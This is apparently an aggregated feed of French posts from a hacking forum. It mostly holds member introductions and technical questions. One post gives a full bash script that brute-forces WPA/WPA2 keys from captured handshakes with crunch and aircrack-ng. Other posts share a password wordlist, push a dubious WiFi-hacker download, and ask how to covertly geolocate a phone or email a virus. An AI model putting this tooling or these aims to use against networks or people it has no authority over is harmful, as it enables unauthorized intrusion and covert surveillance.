mercredi 30 décembre 2015

Présentation Hikaru

Bonjour à tous,

Et merci de m'accueillir parmi vous. Bravo pour ce forum !

Pseudo : Hikaru
Prénom : Alexandre
Connaissances informatiques générales : Plutôt bonne (bac +5 école d'IT, c'est mon métier)
Connaissances en hacking : Très moyennes.
Système d'exploitation principal : Windows 10 boulot / Windows 10 + Linux (debian 8) perso
Je viens sur ce forum pour : Apprendre !
J'ai connu ce forum via : Google
Informations supplémentaires (job, intérêts, autres...) : ingé réseau / sécu ; tir à l'arc ; littérature (particulièrement la SF)


L'objectif est d'apprendre depuis la base et de faire le lien entre mon travail quotidien (firewall, proxy, routeurs, anti-spam, etc. professionnels) et le hacking, auquel je suis ou serai confronté. Mes compétences en dev/script sont assez faibles, cela devient important de progresser, à mon avis.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PwXev7
via IFTTT

mardi 29 décembre 2015

Script bash pour le crack par force brute des clés WPA/WPA2

Salut, je suis Rodrigue Daniel

Je partage avec vous mon script bash, permettant de faire le crack par force brute sur les clés WPA(ou WPA2) pour un réseau WIFI.
Mon script fait la combinaison de trois programmes : crunch, aircrack-ng, parallel2. En effet une fois que l'on a récupéré le fichier issu du challenge entre un client légitime et le point d'accès ciblé, alors l'on peut utiliser ce script pour lancer une attaque par force brute pour casser une clé WPA(ou WPA2). Voici mon script :

Code:


#!/bin/bash
#
# bruteForceWPA : Script de crack WIFI des clés WPA/WPA2
# Rodrigue Daniel (email : rodrigue_daniel@yahoo.com)
# Mon blog : rodriguedaniel.blogspot.com
# 16/08/2015
# Dépendances : crunch, aircrack-ng, parallel2
# Testé sur Ubuntu et Kali Linux
 
set -u
 
###########################################################################################
# Definitions des variables
mini="" # variable contenant la longueur minimale des mots de passe
maxi="" # variable contenant la longueur maximale des mots de passe
ensCarac="" # variable contenant l'ensemble des caractères à utiler
numEnsCarac="" # variable contenant le numero de l'ensemble des caractères à utiliser
fichierCap="" # variable contenant le fichier .cap à craquer
chaineEssid="" # variable contenant la chaîne essid du point d'accès WIFI
option=""  # variable contenant les options
optionSeul=""  # variable spécifiant le traitement unique de l'option -h ou --help
comSyntOpt="" # variable spécifiant que la combinaison des options a et m est interdite
# Ensemble des caractères à utiliser
format1='1 -> [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]'
format2='2 -> [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]'
format3='3 -> [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]'
format41='4 -> [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~[]{}|\:;"'
format42="'"
format43='<>,.?/ ]'
 
###########################################################################################
# Debut du script
version="0.2"
 
clear
echo -e "\e[00;31m###########################################################\e[00m"
echo -e "\e[00;31m#                                                        #\e[00m"
echo -e "\e[00;31m#  bruteForceWPA : crack wifi (WPA/WPA2)                  #\e[00m"
echo -e "\e[00;31m#                                                        #\e[00m"
echo -e "\e[00;31m###########################################################\e[00m"
 
# Vérification du mode root
if [[ $EUID -ne 0 ]]; then
        echo -e "\n Erreur : Ce programme doit être éxécuté en root.\n"
        exit 1
fi
 
# Vérification de la présence du programme crunch
which crunch >/dev/null
if [ $? -eq 1 ]; then
        echo -e "\n Erreur : Impossible de trouver le programme crunch, installez-le et rééssayez.\n"
        exit 1
fi
 
# Vérification de la présence du programme aircrack-ng
which aircrack-ng >/dev/null
if [ $? -eq 1 ]; then
        echo -e "\n Erreur : Impossible de trouver le programme aircrack-ng, installez-le et réessayez.\n"
        exit 1
fi
 
# Vérification de la présence du programme parallel et de sa bonne version
which parallel >/dev/null
if [ $? -eq 1 ]; then
        echo -e "\n Erreur : Impossible de trouver le programme parallel, installez-le et réessayez.\n"
        exit 1
fi
 
while getopts ":a:c:f:g:hm:p:-:" option ; do
 if [ "$option" = "-" ] ; then
  case $OPTARG in
  help ) option=h ;;
  #max ) option=g ;;
  #min ) option=p ;;
  * ) echo "$(basename $0): Option inconnue $OPTARG"
      echo -e "Essayer '$0 --help' pour plus d'information.\n"
      option=""
      ;;
  esac
 fi
 case $option in
  h ) echo -e "\nVersion $(basename $0) $version - (C) 2015"
      echo -e "Auteur: Rodrigue Daniel (email : rodrigue_daniel@yahoo.com) \n"
      echo "Syntaxe : $0 [option...]"
      echo -e "\nOptions :"
      echo " -a <chiffre> : Numéro de l'ensemble des caractères ci-dessous à utiliser (par défaut -> 1)."
      echo ""
      echo -ne "\t"
      echo $format1
      echo -ne "\t"
      echo $format2
      echo -ne "\t"
      echo $format3
      echo -ne "\t"
      echo -n $format41
      echo -n $format42
      echo $format43
      echo -e "\t (Par défaut l'option -a est pris en compte)"
      echo -e "\n -c <essid> : Nom essid du point d'accès WIFI (Option Obligatoire)."
      echo " -f <chaine> : Nom du fichier d'extension '.cap' à craquer (Option Obligatoire)."
      echo " -m <chaine> : Ensemble des caractères à saisir manuellement. Ne pas utiliser avec '-a' ."
      echo " -g <entier> : Longueur maximun des mots de passe (par défaut -> 15)."
      echo " -h, --help : Cet écran d'aide."
      echo -e " -p <entier> : Longueur minimun des mots de passe (par défaut -> 5).\n"
      optionSeul="o"
      exit 1
      ;;
  a ) if [ "$optionSeul" != "o" ] ; then
      if [ "$comSyntOpt" = "m" ] ; then
        echo "Erreur de syntaxe: '-a' ne doit pas être utilisée avec '-m'"
        echo -e "Essayer '$0 --help' pour plus d'information.\n"
        exit 1
      else
        numEnsCarac=$OPTARG
        case $numEnsCarac in
                1 ) ensCarac="mixalpha-space";;
                2 ) ensCarac="mixalpha-numeric-space";;
                3 ) ensCarac="mixalpha-numeric-symbol14-space";;
                4 ) ensCarac="mixalpha-numeric-all-space";;
        esac
      fi
    fi
    ;;
  c )if [ "$optionSeul" != "o" ] ; then
      chaineEssid=$OPTARG
    fi
    ;;
  f ) if [ "$optionSeul" != "o" ] ; then
      if [ "${OPTARG##*.}" != "cap" ] ; then
          echo "Nom fichier incorrect"
          echo -e "Essayer '$0 --help' pour plus d'information.\n"
          exit 1
      else
          fichierCap=$OPTARG
      fi
      fi
      ;;
  g ) if [ "$optionSeul" != "o" ] ; then
          maxi=$OPTARG
      fi
      ;;
  m ) if [ "$optionSeul" != "o" ] ; then
      if [ "$numEnsCarac" != "" ] ; then
          echo "Erreur de syntaxe: '-a' ne doit pas être utilisée avec '-m'"
          echo -e "Essayer '$0 --help' pour plus d'information.\n"
          exit 1
      else
          ensCarac=$OPTARG
          comSyntOpt="m" # m -> configuration manuelle de l'ensemble des caractères à utiliser
      fi
      fi
      ;;
  p ) if [ "$optionSeul" != "o" ] ; then
          mini=$OPTARG
      fi
      ;;
  : ) if [ "$optionSeul" != "o" ] ; then
      echo "Argument manquant pour l'option -$OPTARG"
      echo -e "Essayer '$0 --help' pour plus d'information.\n"
      exit 1
      fi
      ;;
  ? ) if [ "$optionSeul" != "o" ] ; then
      echo "$(basename $0): Option inconnue $OPTARG"
      echo -e "Essayer '$0 --help' pour plus d'information.\n"
      exit 1
    fi
    ;;
 esac
done
 
# Exécution du crack de la clé WPA/WPA2
 
i=${mini:-5}
j=${maxi:-15}
 
if [ $i -eq $j ] ; then
        echo "1" > /tmp/temporaire
        echo "$i" >> /tmp/temporaire
else
        while [ $i -le $j ] ; do
                echo "$i" >> /tmp/temporaire
                i=$((i + 1))
        done
fi
 
bruteForce ()
{
 if [ "$numEnsCarac" = "" ] ; then
      ( crunch $1 $1 $ensCarac  2>/dev/null | aircrack-ng $fichierCap -e $chaineEssid -l resCrack -w- ) >/dev/null 2>&1
 else
      ( crunch $1 $1 -f charset.lst $ensCarac  2>/dev/null | aircrack-ng $fichierCap -e $chaineEssid -l resCrack -w- ) >/dev/null 2>&1
 fi
}
 
if [ "$optionSeul" != "o" ] ; then
 if [ "$chaineEssid" = "" ] || [ "$fichierCap" = "" ] ; then
      echo "Les options -c et -f sont obligatoires"
      echo -e "Essayer '$0 --help' pour plus d'information.\n"
      exit 1
 else
      export -f bruteForce
      export numEnsCarac
      export ensCarac
      export fichierCap
      export chaineEssid
      parallel --will-cite --bar -a /tmp/temporaire bruteForce >/dev/null # Parallélisme
      rm /tmp/temporaire
 fi
fi


Vos critiques, vos suggestions seront la bienvenue...
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1mQ5DAK
via IFTTT

How to hack FIFA 16 coins?

Je joue FIFA 16 pendant un certain temps, je ne suis pas trop des pièces, mais je veux obtenir une équipe ultime, comment je peux pirater quelques pièces de monnaie?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ZAvVVx
via IFTTT

[ Achat ordinateur ]

Bonjour à tous,

Voila voila, je dispose d'un 15 pouces et celui-ci n'est pas très pratique a balader jusqu'à l'université. J'aimerais acheter un nouveau PC sachant que celui-ci fonctionne

parfaitement(SociétéDeConsommation++, il ira surement à un membre de la famille). Bref, j'ai déjà ma petite idée, un 13 pouces avec une bonne autonomie.

Deux choix s'offrent à moi, un ultrabook type asus zenbook ux301/2/3.. OU un Mac.

Les prix des ASUS varient entre 700€ et 900€ et le prix du Mac(Mac book air) serait de 937€(Réduc' étudiant)

Je fréquente ce forum depuis pas mal de temps maintenant et, moi qui était anti-Apple j'ai croisé pas mal de personne qui utilisaient des produits Apple

je parle de talk Defcon, de la Nuit du hack etc.. Je me suis alors demandé pourquoi je détesté tant Apple, et j'ai rien trouvé :o (Données personnelles ??? Open Source ???)

Je n'ai jamais utilisé de produit Apple mais les faits sont là, beaucoup de personnes qui travaillent dans la sécurité info' utilisent des produits Apple.

J'utilise Ubuntu depuis 2 ans, et je pense pas que découvrir un nouvel OS serait un frein, voir l'inverse..

Je trouve ici une occasion d'essayer un produit Apple ou de rester sur du "logiciel libre" et du matériel lambda, quel est votre avis / choix sur la question ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OiNFAV
via IFTTT

Oltaroxos.

Pseudo (+autres si plusieurs) : Oltaroxos
Connaissances informatiques générales : Très peu, just beaucoup de volonté :D
Connaissances en hacking : Idem.
Système d'exploitation principal : Win7 64bits.
Je viens sur ce forum pour : Apprendre !
J'ai connu ce forum via : Un ami.

Salut !

Je viens sur ce forum pour vous demandez de hacker le compte facebook de ma sœur ;)

Je plaisante bien-sûr, je suis passionné d'informatique ( pour l'instant je n'ai que monté mon propre PC ) même si c'est pas de l'informatique plutôt du HardWare j'en suis assez fier mais bon.
Je viens sur ce forum car un ami me l'as conseillé, je désire apprendre pourquoi de la programmation j'avais commencer à apprendre du C, mais surtout je suis intéressé par le Hacking, en fait j'aimerais "Crocheter" des choses sur des ordinateurs simplement :rolleyes:

Bon je dit un peu n'importe quoi mais bon, j’espère que j'aurais une bonne expérience sur ce forum et que j'apprendrais des choses, merci d'avoir lu :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1JGUSp2
via IFTTT

lundi 28 décembre 2015

News [Projet] Le Réseau Tchat-Discut.

Bonsoir,


Le réseau Tchat-Discut.fr a ouvert ses ports en Septembre 2015.
Nous reprenons actuellement le réseau en mains pour lui faire peau-neuve. Tchat-Discut est un endroit où tout le monde peut se retrouver pour discuter de sujets variés sur nos différents canaux thématiques. Comme l'indique le nom de domaine, le réseau est francophone mais nous avons également des canaux pour différentes nationalités. Hé oui ! Tout le monde a le droit de venir sur un réseau.
Chez Tchat-Discut nous avons une devise : "L'utilisateur viendra, verra, reviendra.". Evidemment, ce réseau est à but non-lucratif, nous tenons à le préciser pour qu'il n'y ait aucun malentendu.
Toute la Team de Tchat-Discut est à votre écoute en permanence et s'efforce de répondre à vos meilleures attentes dans les plus brefs délais.


Pour nous rejoindre :

Site web : http://tchat-discut.fr/ (Nous nous efforçons de le tenir à jour et de le faire évoluer au mieux.)
Chat : irc.Tchat-Discut.fr:6667 ou http://ift.tt/1ME6OYE (AUCUNE INSCRIPTION N'EST REQUISE)

Vous pourrez discuter sur nos différents canaux officiels thématiques : #Informatique, #Programmation, #Politique, #Charme, etc.

En espérant pouvoir vous accueillir sur notre réseau prochainement,


Cordialement,
La Team Tchat-Discut


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1YK8f4b
via IFTTT

Javascript for Pentester (Vivek Ramachandran)

Salut la communauté, je cherche depuis peu le programme de formation Javascript for Pentester de Vivek
Si vous l'avez, s'il vous plaît faites moi un Partage.
Merci d'avance


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NLpQ3t
via IFTTT

Présentation de Que20

Hello world !

Comme le veut la tradition : j'me présente, je m'appelle Henry... non en fait moi c'est Que20 (je vous laisse chercher mon prénom :p)

La sécurité informatique est un petit coup de cœur depuis plusieurs années, même si au départ je n'y comprenais rien. J'estime d'ailleurs toujours avoir un faible niveau en la matière.

Au niveau des "compétences", j'ai commencé (comme beaucoup) par les failles web (injections SQL, XSS, LFI/RFI etc) puis plus récemment je me suis mis en tête de me perfectionner dans les failles applicatives, qui ont toujours été très difficiles à aborder (il est fort probable que je pose quelques questions à ce sujet ^^). Pour le moment, à mon niveau je sais exploiter des failles (buffer overflows, format string) sans protections (en gros sans ASLR et canary. NX seul, ça, j'arrive à le bypasser mais combiné avec les autres, là, c'est hard !), l'idéal serait de parvenir à faire de même avec certaines protections activées (surtout l'ASLR, le canary ça vole encore un peu trop haut pour moi... :p).

Je suis inscrit sur quelques sites de challenges (qui ont donc justement pour but "l’apprentissage par la pratique" de la sécurité informatique) mais celui où je suis principalement actif est Root Me (voici d'ailleurs mon profil : http://ift.tt/1PsruHz ).

Je connaissais Hackademics de nom mais je n'avais jamais pris la peine de m'y inscrire, c'est désormais chose faite ! ^_^

J'ai également écrit 2 articles sur Zeste de Savoir (un fork du site du zéro), un sur les injections SQL et l'autre sur les XSS. Les 2 sont dispos ici : http://ift.tt/1YIJdCg

Bref, je suis là pour apprendre et apprendre : apprendre à continuer de torturer mes sites, programmes ainsi que mon pauvre cerveau afin de leur faire autre chose que ce pour quoi ils ont été conçus mais aussi apprendre dans le sens de partager, à mon tour, le peu de connaissances que j'ai pu accumuler pendant toutes ces années car sans tous les tutoriels, articles, sites, forums que j'ai pu lire, je n'en serai vraiment pas là. Il est donc tout à fait normal de faire même. ;-)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PsrwiM
via IFTTT

dimanche 27 décembre 2015

(word list ) pour les mots de passe de type date de naissance

je vais vous presenter un fichier dictionnaire (word list ) pour cracker des fichier handshack ayant des mots de passe de type date de naissance
telecharger ICI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1mcFuMp
via IFTTT

vendredi 25 décembre 2015

Ma petite présentation

Pseudo : Lokie12
Connaissances informatiques générales : Très bonnes
Connaissances en hacking : Très bonnes également
Système d'exploitation principal : Windows
Je viens sur ce forum pour : continuer d'apprendre et aider les membres !
J'ai connu ce forum via : Google
Informations supplémentaires (job, intérêts, autres...) : Je suis étudiant.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1YCGhXW
via IFTTT

Joyeux Noël à tous :D

Joyeux Noël à tous :)

Juste un petit post, pour vous souhaitez a tous un Joyeux Noël, plein de belles choses... ;)

Qu'avez vous reçus ?

Pour ma pat, un nouveau lit (merci Seigneur, mon dos n'aurais pas tenu encore longtemps ;)), des CD, des bons d'achat...
Bref pas mal de choses, et puis, c'est aussi l'occasion de partager un bon moment en famille :D

A oui, avant de vous quitter... Je suis désolé, j’ai pas pu m'en empêcher :D

http://ift.tt/1MzkMei

Aller, on arrête la les conneries, bonne journée a tous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OqYOBH
via IFTTT

jeudi 24 décembre 2015

Présentation de RedNoxious

Pseudo (+autres si plusieurs) : Red ou bien RedNoxious

Plus d'informations sur Moi: Je viens des Pays-Bas, a 5 ans j'ai déménagé en Bretagne, 5 ans après j'ai déménagé en Alsace et ensuite 6 ans plus tard j'ai déménagé en Allemagne.

Connaissances informatiques générales : J'ai un peut étudié le HTML et le CSS, un minuscule peut de LUA et de JAVA.

Connaissances en hacking : 3/10

Système d'exploitation principal : Windows 7

Je viens sur ce forum pour : Apprendre à faire des pénétration tests.

J'ai connu ce forum via : Un ami nommé Thegameur.

Informations supplémentaires (job, intérêts, autres...) : Je suis passionné par le Graphisme, sa fais environ 4/3 ans que j'en fais.
Sinon le codage, le scripting, me plaisent aussi.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Jxhich
via IFTTT

mercredi 23 décembre 2015

Problème de communication entre deux interfaces réseau sous debian et ses héritiers

Salut je suis Rodrigue Daniel

Voilà j'ai installé Debian6 (même Debian7) sous virtualbox, je l'ai attribué deux cartes réseau virtuelles.
J'ai fait une remarque qui me chargrine beaucoup:

Avec deux interfaces réseau nommées eth0 et eth1, j'ai configuré comme suit : eth0 -> 192.168.7.1/24 et eth1 -> 172.16.7.1/24
J'ai même activé le routage.

Le problème est que lorsque j'effectue un ping vers l'interface eth0 à partir de l'interface eth1 (et vice versa), le ping ne donne rien. Cela est un peu étrange car il s'agit d'une même machine virtuelle. Pourtant avec une 2ème machine configurée dans le sous-réseau de l'interface eth0 avec @IP_eth0 comme passerelle (normal) et une 3ème machine dans le sous-réseau de l'interface eth1 avec aussi @IP_eth1 comme passerelle (normal), je parviens à pinguer la 3ème machine à partir de la 2ème machine et vice versa.

Donc au final, est-il possible de pinguer une interface d'une machine à partir d'une autre interface de la même machine?
En guise d'exemple avec la commande :

Citation:

ping -I eth0 172.16.7.1


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1O9pAMX
via IFTTT

Problème d'arrêt d'un processus Linux avec la commande KILL

Salut je suis Rodrigue Daniel

J'ai fait une remarque pour les systèmes Ubuntu. lorsqu'un service est installé (ou configuré) et lancé, impossible d'arrêter son processus via la commande kill. En effet lorsque j'essaye de tuer un processus associé à un service via son PID,le service se redemarre automatiquement avec un nouveau PID. J'ai beaucoup plus fait la remarque avec les services réseau tels que ssh, bind9...
J'ai fait les recherches sur la toile mais sans succès.

Aidez-moi SVP
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1IpnEj8
via IFTTT

mardi 22 décembre 2015

Demande d'un lien pour le livre : système d'exploitation d'Andrew TanenBaum

Salut, je suis Rodrigue Daniel

SVP, je cherche depuis un certain temps (sans succès) le livre en français sur le système d'exploitation de Andrew Tanenbaum.
Est ce quelqu'un peut me proposer un lien?

MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SanXjP
via IFTTT

Aidez moi

Bonjour je cherche a geolocaliser un telephone a partir de son numero sans que la personne le sache


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1U32XKk
via IFTTT

Présentation: Cap0ral

Pseudo (+autres si plusieurs) : Cap0ral
Connaissances informatiques générales : Maitrise du BIOS
Connaissances en hacking : Web Hacking - DoS - ARP Poisoning - Pentesting - Phishing
Système d'exploitation principal : Linux (BackTrack - Parrot Secu OS - Xubuntu)
Je viens sur ce forum pour : Assoupir ma soif de curiosité
J'ai connu ce forum via : Franchement....Au pif :o
Informations supplémentaires (job, intérêts, autres...) :
13 ans,fan de Surf/Skate


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OJ60TV
via IFTTT

lundi 21 décembre 2015

ipod version 2.2.1

salut a tous le monde voila j'ai un petit souci,j'ai recemment achete une ipod à moins chèr à cause de son ancienneté (ipod modèle MA623C)version 2.2.1, mon probleme est que j'ai cherché sur internet son firmware le plus recent pour en profiter de nouvelle application mais je l'ai pas trouvé pourriez vous m'aider car je viens de me rendre compte que je ne peux ni me rendre sur internet ni telecharger via ce dernier merci d'avance.....


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NGPVyd
via IFTTT

dimanche 20 décembre 2015

Présentation Drakop

Bonjour/soir, moi c'est Maxime IRL, je suis étudiant en informatique (BTS SIO opttion réseaux) plus particulièrement intéressé par le réseau même si j'aime beaucoup la programmation.j'aimerais après avoir obtenu mon BTS aller en école d'ingé si j'en ai la possibilité(en tout cas je vais tout faire pour :D), plus tard j'aimerais travailler dans la cyber sécurité.
Concernant mes connaissances en informatique :
-Programmation : python,c,c# : j'ai de bonnes bases.
-Réseaux : bases des réseaux, adressage ip v4, routage.
-OS :win7/Kali linux même si je pense que c'était une mauvaise idée de commencer par celui-ci pour aborder du linux .. :D
-sécurité/hacking : J'ai pas mal utilisé Metasploit que j'ai testé plusieurs fois sur mon LAN, j'ai utilisé Wireshark également,des logiciels de brute force mais je n'ai été très convaincu par ceux-ci.

J'aimerais me perfectionner, apprendre de nouvelles choses en ce qui concerne le hacking mais aussi me perfectionner en programmation(python, c surtout pour l'instant), mais également bien comprendre et pouvoir utiliser correctement Linux.

Merci de m'avoir lu ! Bonne journée/soirée !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OENo7L
via IFTTT

Présentation Nathitshe

Actuellement en classe de troisième, je suis l'une des personnes les plus intéressé par la sécurité informatique.

Je passe la plus part de mon temps à essayer de rentrer par effraction sur des systèmes (m'appartenant évidement :) en augmentant la sécurité à chaque réussite afin de d'améliorer mon niveau.

Sinon, je voudrais m'orienter sécurité informatique pour devenir RSSI (Responsable en sécurité des systèmes d'information), en faisant des études d'ingénierie (à l'EPITA).


Programmation :
HTML, CSS, bonne connaissance en Javascript, (en formation sur Python)

Linux :
Commandes Debian avancées (Gestion des fichiers sans GUI + commandes pour le hacking [arp, ping, kill] + maîtrise du Meterpreter pour Metasploit)

Hacking :
- Maîtrise de Metasploit, bon niveau,
- Maîtrise de Beef Framework
- Et plein d'autres logiciels connus :)

Ingénierie Social :
Bonne connaissance en relation humaine pour pouvoir ainsi convaincre une potentielle victime de faire des choses contre son grès :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QD46Ku
via IFTTT

Présentation kikks

Pseudo :kikks
Connaissances informatiques générales :administrateur systeme
Connaissances en hacking :débutant
Système d'exploitation principal :Linux
Je viens sur ce forum pour :Apprendre
J'ai connu ce forum via :heu google :)
Informations supplémentaires (job, intérêts, autres...) :apprendre la sécurité informatique


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1JlxvBp
via IFTTT

jeudi 17 décembre 2015

Processus

Bonsoir,
J’espère écrire dans la bonne catégorie (si ce n'est pas le cas je m'excuse).
Alors voila mon soucis : j'aimerai savoir si sous linux il est possible de savoir si un processus va être stopper avant qu'il le soit. Par exemple imaginons que je lance firefox, puis que je le stop avec un signal, comment je pourrais faire pour qu'il y est un message (sur un autre terminal par exemple) avant que firefox s'arrête. Puis après ce message firefox est arrêté.
J'espère que ma question est assez clair ^^'
Merci d'avance pour vos réponses !
Respectueusement,
Bravej


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1JfbTXc
via IFTTT

mercredi 16 décembre 2015

ecrire gentil virus

bonsoir,
je voudrais pour mon ami Polo, qui se reconnaitra, ecrire un petit virus (gentil)a envoyer par mail
j'ai essaye avec dardkcomet et autres, mais le souci est que outlook ne me laisse pas passer
je cherche le moyen de faire
des idées ?????
merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RShoSV
via IFTTT

mardi 15 décembre 2015

Présentation MacGyver

Pseudo : MacGyver
Connaissances informatiques générales : Développement WEB (js/php/html/css) un peu de C/C++/C#
Connaissances en hacking : Aucune pour le moment
Système d'exploitation principal : Windows mais dernièrement Linux
Je viens sur ce forum pour : Apprendre
J'ai connu ce forum via : Tout seul ^^
Informations supplémentaires (job, intérêts, autres...) : En alternance a ENGIE en tant que developpeur d'applications Web


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Uv3o0I
via IFTTT

Script Match

Bonjour a tous !

Voila je bosse sur un petit projet personnel ,j'aimerais faire jouer un match entre 2 equipes (Equipe A, Equipe B) et c'est la ou tout bloque je ne vois pas du tout comment procéder , sachant que je veux que ce soit aleatoire (les caractéristiques des joueurs ne rentrent pas en considération pour le moment ) , je ne cherche pas une reponse mais des petits indices a fin de me guider vers la voie :)

Merci beaucoup d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1TNFLzx
via IFTTT

Wifi Password Hack Program ( FREE )

a magnificent WiFi password cracking programs to friends. I broke a WiFi password with programs. I share the sizlerede.

After downloading the program. Enter into the jump file. Before jump.ex to. Contact. then the second file, enter the WiFi hacking program file. WiFi hacker exe. Install the file. After the installation process. desktop. Run wifi password hacker program. the upper right corner. Click to place the summer scan. WiFi users will find in the region. Try one at all. It is absolutely try to avoid a break.

http://ift.tt/1QJyrpb


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Nn9sWC
via IFTTT

lundi 14 décembre 2015

split d'un fichier infecté

salut a tous,
ma question est simple (a dire)
j'ai un fichier infecté par un virus et detecté par Kaspersky
si je le splitte en plusieurs fichiers independants, et les analyse, aucun des fichiers n'est infecté.!
pas normal du tout, non ??
merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1I3cqk8
via IFTTT

dimanche 13 décembre 2015

voir un autre ordinateur sur un réseau LAN

Bonjour tout le monde,j'ai une question : je voulais savoir si c'était possible d'observer ce que fait un autre ordinateur(ordi portable)à partir de mon ordi sachant que les deux sont connecté à mon réseau LAN?

Et si oui comment faire?

merci d'avance pour vos réponse.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Qe72xe
via IFTTT

samedi 12 décembre 2015

Probléme virtualbox

Bonsoir à vous ,

je suis sur manjaro et quand je veut lancer virtualbox cela me dit :
WARNING: The vboxdrv kernel module is not loaded. Either there is no module
available for the current kernel (4.1.13-1-MANJARO) or it failed to
load. Please recompile the kernel module and install it by

sudo /sbin/vboxconfig

You will not be able to start VMs until this problem is fixed.

Donc que faire .


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1UhQiny
via IFTTT

jeux video mmo deporter des infos sur des peripheriques android ou ios

Bonjour tout le monde
Etant fan de jeux vidéos et jouant actuellement sur les alphas de http://ift.tt/17rXMv8 je voudrais réaliser un projet autour de ce jeu
Dans cette simulation de vaisseaux spatial il y a énormément d'infos à gérer pour que le jeu soit immersif , malheureusement des fois en plein dogfigt ou il faut réagir très vite il faut se transformer en vrai poulpe changer d'écran a la volé pour gérer arme bouclier allié cible et j en passe ...
ce qui m amène au cœur du sujet :
J'aimerais prendre certaine information extrêmement précieuse et les avoir à porter de main sur un écran déporter android ou ios par exemple .
je dois gérer des boucliers?!?! ben l'onglet bouclier est sur ma tablette android et en un simple glisser de doigt je dirige mon bouclier la ou bon me semble
je pourrais aussi avoir besoin de faire des macro du style exécuter une figure aérienne bien spéciale a un moment ...
il y a plein d autre chose a imaginer....
je vous donne des exemples:
https://www.youtube.com/watch?v=Q2LE1gbUyPY (dans la vidéo c est un élément de tableau de bord d'avion...mais l idée est la même pour mon projet)

pour le moment je suis dans la partie ou j essaye de comprendre comment cela peux marcher
je suppose que je vais devoir faire un reverse du client du jeux vidéo et travailler au niveau de la communication IP , analyser les trames et les reproduire
puis ensuite coder un "client android/ serveur pc" pour que quand je fasse une action sur la tablette, elle sois répercuté sur le pc

suis je dans le vrai?

de plus comment le serveur de mon appli serveur peut intérargir sur le jeu? doit il lui aussi être logger avec mes identifiant? auquel cas il y aurai conflit(2meme sessions ouverte pour le même compte)
ou il enverrai le commande par l'intermédiaire du client jeu lui même ?
en espérant que cela vous intéresse et vous donne l'envie de me filer un coup de patte :)
++


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1M961if
via IFTTT

vendredi 11 décembre 2015

Présentation Atiken

Pseudo (+autres si plusieurs) : Atiken
Connaissances informatiques générales : basique, je sais me débrouiller quand j'au un problème
Connaissances en hacking : pas grand chose
Système d'exploitation principal : Windows 10
Je viens sur ce forum pour : Je vient ici pour apprendre la sécurité informatique, connaitre mieux les os
J'ai connu ce forum via : grasse un ami
Informations supplémentaires (job, intérêts, autres...) :


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Y3kmJ6
via IFTTT

